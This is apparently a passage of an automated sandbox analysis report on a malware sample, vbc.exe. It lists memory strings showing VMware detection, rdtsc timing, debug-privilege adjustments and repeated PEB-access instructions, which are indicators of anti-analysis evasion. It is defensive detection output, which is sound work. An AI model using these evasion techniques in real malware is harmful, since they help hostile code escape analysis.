        Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
        Source: explorer.exe, 00000007.00000000.471787867.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: explorer.exe, 00000007.00000000.473972364.00000000042EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: explorer.exe, 00000007.00000000.536669391.00000000042A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01685BA5 rdtsc 6_2_01685BA5
        Source: C:\Users\user\Desktop\vbc.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h]6_2_015DB944
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h]6_2_015DB944
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h]6_2_015BB171
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h]6_2_015BB171
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BC962 mov eax, dword ptr fs:[00000030h]6_2_015BC962
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h]6_2_015B9100
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h]6_2_015B9100
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h]6_2_015B9100
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E513A mov eax, dword ptr fs:[00000030h]6_2_015E513A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E513A mov eax, dword ptr fs:[00000030h]6_2_015E513A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]6_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]6_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]6_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]6_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120 mov ecx, dword ptr fs:[00000030h]6_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016441E8 mov eax, dword ptr fs:[00000030h]6_2_016441E8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h]6_2_015BB1E1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h]6_2_015BB1E1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h]6_2_015BB1E1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]6_2_016749A4
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]6_2_016749A4
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]6_2_016749A4
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]6_2_016749A4
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016369A6 mov eax, dword ptr fs:[00000030h]6_2_016369A6
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2990 mov eax, dword ptr fs:[00000030h]6_2_015E2990
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EA185 mov eax, dword ptr fs:[00000030h]6_2_015EA185
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]6_2_016351BE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]6_2_016351BE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]6_2_016351BE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]6_2_016351BE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC182 mov eax, dword ptr fs:[00000030h]6_2_015DC182
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h]6_2_015E61A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h]6_2_015E61A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h]6_2_015D0050
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h]6_2_015D0050
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672073 mov eax, dword ptr fs:[00000030h]6_2_01672073
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01681074 mov eax, dword ptr fs:[00000030h]6_2_01681074
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]6_2_015DA830
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]6_2_015DA830
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]6_2_015DA830
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]6_2_015DA830
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]6_2_015E002D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]6_2_015E002D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]6_2_015E002D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]6_2_015E002D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]6_2_015E002D
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637016 mov eax, dword ptr fs:[00000030h]6_2_01637016
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637016 mov eax, dword ptr fs:[00000030h]6_2_01637016
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01637016 mov eax, dword ptr fs:[00000030h]6_2_01637016
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]6_2_015CB02A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]6_2_015CB02A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]6_2_015CB02A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]6_2_015CB02A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01684015 mov eax, dword ptr fs:[00000030h]6_2_01684015
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01684015 mov eax, dword ptr fs:[00000030h]6_2_01684015
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]6_2_0164B8D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov ecx, dword ptr fs:[00000030h]6_2_0164B8D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]6_2_0164B8D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]6_2_0164B8D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]6_2_0164B8D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]6_2_0164B8D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B58EC mov eax, dword ptr fs:[00000030h]6_2_015B58EC
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h]6_2_015DB8E4
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h]6_2_015DB8E4
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h]6_2_015B40E1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h]6_2_015B40E1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h]6_2_015B40E1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9080 mov eax, dword ptr fs:[00000030h]6_2_015B9080
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EF0BF mov ecx, dword ptr fs:[00000030h]6_2_015EF0BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h]6_2_015EF0BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h]6_2_015EF0BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01633884 mov eax, dword ptr fs:[00000030h]6_2_01633884
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01633884 mov eax, dword ptr fs:[00000030h]6_2_01633884
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F90AF mov eax, dword ptr fs:[00000030h]6_2_015F90AF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BF358 mov eax, dword ptr fs:[00000030h]6_2_015BF358
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BDB40 mov eax, dword ptr fs:[00000030h]6_2_015BDB40
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h]6_2_015E3B7A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h]6_2_015E3B7A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688B58 mov eax, dword ptr fs:[00000030h]6_2_01688B58
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BDB60 mov ecx, dword ptr fs:[00000030h]6_2_015BDB60
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167131B mov eax, dword ptr fs:[00000030h]6_2_0167131B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h]6_2_016623E3
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h]6_2_016623E3
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E3 mov eax, dword ptr fs:[00000030h]6_2_016623E3
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016353CA mov eax, dword ptr fs:[00000030h]6_2_016353CA
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016353CA mov eax, dword ptr fs:[00000030h]6_2_016353CA
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DDBE9 mov eax, dword ptr fs:[00000030h]6_2_015DDBE9
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]6_2_015E03E2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]6_2_015E03E2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]6_2_015E03E2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]6_2_015E03E2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]6_2_015E03E2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]6_2_015E03E2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2397 mov eax, dword ptr fs:[00000030h]6_2_015E2397
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01685BA5 mov eax, dword ptr fs:[00000030h]6_2_01685BA5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EB390 mov eax, dword ptr fs:[00000030h]6_2_015EB390
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h]6_2_015C1B8F
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h]6_2_015C1B8F
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166D380 mov ecx, dword ptr fs:[00000030h]6_2_0166D380
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167138A mov eax, dword ptr fs:[00000030h]6_2_0167138A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h]6_2_015E4BAD
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h]6_2_015E4BAD
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4BAD mov eax, dword ptr fs:[00000030h]6_2_015E4BAD
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h]6_2_0166B260
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166B260 mov eax, dword ptr fs:[00000030h]6_2_0166B260
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688A62 mov eax, dword ptr fs:[00000030h]6_2_01688A62
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]6_2_015B9240
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]6_2_015B9240
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]6_2_015B9240
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B9240 mov eax, dword ptr fs:[00000030h]6_2_015B9240
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F927A mov eax, dword ptr fs:[00000030h]6_2_015F927A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167EA55 mov eax, dword ptr fs:[00000030h]6_2_0167EA55
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01644257 mov eax, dword ptr fs:[00000030h]6_2_01644257
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D3A1C mov eax, dword ptr fs:[00000030h]6_2_015D3A1C
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h]6_2_015B5210
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov ecx, dword ptr fs:[00000030h]6_2_015B5210
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h]6_2_015B5210
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B5210 mov eax, dword ptr fs:[00000030h]6_2_015B5210
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h]6_2_015BAA16
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BAA16 mov eax, dword ptr fs:[00000030h]6_2_015BAA16
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C8A0A mov eax, dword ptr fs:[00000030h]6_2_015C8A0A
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h]6_2_0167AA16
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167AA16 mov eax, dword ptr fs:[00000030h]6_2_0167AA16
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h]6_2_015F4A2C
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F4A2C mov eax, dword ptr fs:[00000030h]6_2_015F4A2C
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA229 mov eax, dword ptr fs:[00000030h]6_2_015DA229
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF mov eax, dword ptr fs:[00000030h]6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2ACB mov eax, dword ptr fs:[00000030h]6_2_015E2ACB
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2AE4 mov eax, dword ptr fs:[00000030h]6_2_015E2AE4
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h]6_2_015ED294
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015ED294 mov eax, dword ptr fs:[00000030h]6_2_015ED294
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h]6_2_015CAAB0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CAAB0 mov eax, dword ptr fs:[00000030h]6_2_015CAAB0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EFAB0 mov eax, dword ptr fs:[00000030h]6_2_015EFAB0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]6_2_015B52A5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]6_2_015B52A5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]6_2_015B52A5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]6_2_015B52A5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B52A5 mov eax, dword ptr fs:[00000030h]6_2_015B52A5
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D7D50 mov eax, dword ptr fs:[00000030h]6_2_015D7D50
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F3D43 mov eax, dword ptr fs:[00000030h]6_2_015F3D43
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01633540 mov eax, dword ptr fs:[00000030h]6_2_01633540
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01663D40 mov eax, dword ptr fs:[00000030h]6_2_01663D40
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h]6_2_015DC577
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DC577 mov eax, dword ptr fs:[00000030h]6_2_015DC577
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0163A537 mov eax, dword ptr fs:[00000030h]6_2_0163A537
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01688D34 mov eax, dword ptr fs:[00000030h]6_2_01688D34
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167E539 mov eax, dword ptr fs:[00000030h]6_2_0167E539
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]6_2_015E4D3B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]6_2_015E4D3B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E4D3B mov eax, dword ptr fs:[00000030h]6_2_015E4D3B
